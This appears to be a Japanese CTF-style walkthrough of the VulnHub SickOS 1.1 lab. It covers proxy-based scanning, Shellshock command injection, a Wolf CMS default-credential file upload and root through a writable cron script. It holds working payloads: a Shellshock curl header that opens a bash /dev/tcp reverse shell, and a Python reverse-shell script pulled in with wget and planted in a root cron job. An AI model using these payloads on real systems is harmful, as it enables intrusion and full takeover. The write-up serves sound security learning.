vulnhub SickOS 1.1 雑記
SickOS 1.1
ovfから展開すると失敗した。 新規から既存ハードディスク追加等ならいける。
サービス調査
# nmap -p- 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:25 EDT Nmap scan report for 10.10.10.9 Host is up (0.00074s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 118.00 seconds # nmap -p22,3128,8080 -sV -version-all 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:28 EDT Nmap scan report for 10.10.10.9 Host is up (0.00086s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) 3128/tcp open http-proxy Squid http proxy 3.1.19 8080/tcp closed http-proxy MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.47 seconds
気になりどころ
- [port 22 ssh] OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) どうせ何もない
- [port 3128 http-proxy] Squid http proxy 3.1.19 これがproxyだってこと忘れていて実は苦労した
詳細
[port 22 ssh] OpenSSH 5.9p1
特に何もない。分からない。
[port 3128 http-proxy] Squid http proxy 3.1.19
こいつ自体のexploitは無さそう?
SickOS1.1のwebサービスへのアクセスは全てport 3128のproxyを経由する必要がある。
# nikto -h 10.10.10.9 -useproxy 10.10.10.9:3128 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.9 + Target Hostname: 10.10.10.9 + Target Port: 80 + Proxy: 10.10.10.9:3128 + Start Time: 2020-05-02 11:33:08 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Retrieved via header: 1.0 localhost (squid/3.1.19) + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128 + Uncommon header 'x-cache' found, with contents: MISS from localhost + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0 + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Uncommon header '93e4r0-cve-2014-6271' found, with contents: true + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + 8674 requests: 0 error(s) and 15 item(s) reported on remote host + End Time: 2020-05-02 11:33:58 (GMT-4) (50 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.9 -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat May 2 11:43:27 2020 URL_BASE: http://10.10.10.9/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/ ---- + http://10.10.10.9/cgi-bin/ (CODE:403|SIZE:286) + http://10.10.10.9/connect (CODE:200|SIZE:109) + http://10.10.10.9/index (CODE:200|SIZE:21) + http://10.10.10.9/index.php (CODE:200|SIZE:21) + http://10.10.10.9/robots (CODE:200|SIZE:45) + http://10.10.10.9/robots.txt (CODE:200|SIZE:45) + http://10.10.10.9/server-status (CODE:403|SIZE:291) ----------------- END_TIME: Sat May 2 11:43:36 2020 DOWNLOADED: 4612 - FOUND: 7
気になるところが沢山ある。
apacheとphp 5.3.10の組み合わせで良さそうなのを発見
# searchsploit apache php 5.3 ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | exploits/php/remote/29316.py Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | exploits/php/remote/29290.c ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
exploitコードそのままではプロキシされている場合汎用性がなかったよう?
cve-2014-6271,CVE-2014-6278に関して
shellshockというのがあるらしい。
# curl --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status { "uptime": " 21:41:52 up 1:10, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}
今回の場合「/cgi-bin/status」に問い合わせると何かコマンド入れたっぽいのが返ってくる。
ここにOSコマンドインジェクションできちゃうのがShellShock!
てか、dirbでは「/cgi-bin/status」引っかからないのな。
とりあえずbashの処理に問題があって、処理を誤魔化すことができるぽい。
# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c id;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status uid=33(www-data) gid=33(www-data) groups=33(www-data)
今回の場合だと「/cgi-bin/status」にどんなヘッダで送っても、処理を誤魔化せるコードならOSコマンドインジェクションできるぽい。
window 1 # rlwrap nc -nlvp 443
window 2 # curl -H "U: () { :;}; echo ; echo ;/bin/bash -c bash -i >& /dev/tcp/10.10.10.3/443 0>&1;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
window 1 id uid=33(www-data) gid=33(www-data) groups=33(www-data) python -c "import pty;pty.spawn('/bin/bash')" www-data@SickOs:/usr/lib/cgi-bin$
reverse-shell!
robots.txt
アクセスすると
User-agent: * Disallow: / Dissalow: /wolfcms
では「wolfcms」というやつを見る。
何かのホームページぽい。
「http://10.10.10.9/wolfcms/?/admin/login」ここにログインページ発見。
まさかのuser:admin,password:adminでログインできる。
ログイン先には何とご丁寧に「Upload file」のボタンが。
reverse.phpを置かせていただくしかない。
window 1 # rlwrap nc -nlvp 8080
window 2 # curl --proxy 10.10.10.9:3128 http://10.10.10.9/wolfcms/public/reverse.php
window 1 Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux 23:34:51 up 3:03, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
after reverse-shell
connect.py
さっきのdirbで実は気になっていた「connect.py」を調べる。
www-data@SickOs:/usr/lib/cgi-bin$ cd /var/www cd /var/www www-data@SickOs:/var/www$ ls ls connect.py index.php robots.txt wolfcms www-data@SickOs:/var/www$ cat connect.py cat connect.py #!/usr/bin/python print "I Try to connect things very frequently\n" print "You may want to try my services"
頻繁にconnect? ますます怪しい。
これは何のことだったのかcronを見ると分かった。
www-data@SickOs:/var/www$ ls -al /etc/cron.d ls -al /etc/cron.d total 20 drwxr-xr-x 2 root root 4096 Dec 5 2015 . drwxr-xr-x 90 root root 4096 May 3 20:31 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rw-r--r-- 1 root root 52 Dec 5 2015 automate -rw-r--r-- 1 root root 544 Jul 2 2015 php5 www-data@SickOs:/var/www$ cat /etc/cron.d/automate cat /etc/cron.d/automate * * * * * root /usr/bin/python /var/www/connect.py
つまり、root権限で定期的に実行される「connect.py」を弄ってやればroot取れる。
attacker # cat getroot.py #! /usr/bin/env python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.3",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); root@kali:~/EXattack/Vulunhub/SickOS1-1# python -m SimpleHTTPServer 80
victim www-data@SickOs:/tmp$ cd /tmp cd /tmp www-data@SickOs:/tmp$ wget 10.10.10.3/getroot.py wget 10.10.10.3/getroot.py --2020-05-03 23:12:22-- http://10.10.10.3/getroot.py Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 238 [text/plain] Saving to: `getroot.py' 100%[======================================>] 238 --.-K/s in 0s 2020-05-03 23:12:22 (17.2 MB/s) - `getroot.py' saved [238/238] www-data@SickOs:/tmp$ cp /tmp/getroot.py /var/www/connect.py cp /tmp/getroot.py /var/www/connect.py
attacker # nc -nlvp 8080
あとは「connect.py」の起動を待つのみ。
動けばroot取れる。
attacker # id uid=0(root) gid=0(root) groups=0(root)
おまけ
# cd /root # ls a0216ea4d51874464078c618298b1367.txt # cat a0216ea4d518^? cat: a0216ea4d518: No such file or directory # cat *.txt If you are viewing this!! ROOT! You have Succesfully completed SickOS1.1. Thanks for Trying
こういうのもあったのか
# dirb http://10.10.10.9/wolfcms -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 3 13:49:54 2020 URL_BASE: http://10.10.10.9/wolfcms/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/wolfcms/ ---- + http://10.10.10.9/wolfcms/composer (CODE:200|SIZE:403) + http://10.10.10.9/wolfcms/config (CODE:200|SIZE:0) ==> DIRECTORY: http://10.10.10.9/wolfcms/docs/ + http://10.10.10.9/wolfcms/favicon.ico (CODE:200|SIZE:894) + http://10.10.10.9/wolfcms/index (CODE:200|SIZE:3975) + http://10.10.10.9/wolfcms/index.php (CODE:200|SIZE:3975) ==> DIRECTORY: http://10.10.10.9/wolfcms/public/ + http://10.10.10.9/wolfcms/robots (CODE:200|SIZE:0) + http://10.10.10.9/wolfcms/robots.txt (CODE:200|SIZE:0) ---- Entering directory: http://10.10.10.9/wolfcms/docs/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.9/wolfcms/public/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sun May 3 13:50:01 2020 DOWNLOADED: 4612 - FOUND: 7 # dirb http://10.10.10.9/cgi-bin -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 3 13:50:10 2020 URL_BASE: http://10.10.10.9/cgi-bin/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/cgi-bin/ ---- + http://10.10.10.9/cgi-bin/status (CODE:200|SIZE:197) ----------------- END_TIME: Sun May 3 13:50:17 2020 DOWNLOADED: 4612 - FOUND: 1
終
cronとhttp.confと.htaccessを注意深くみる。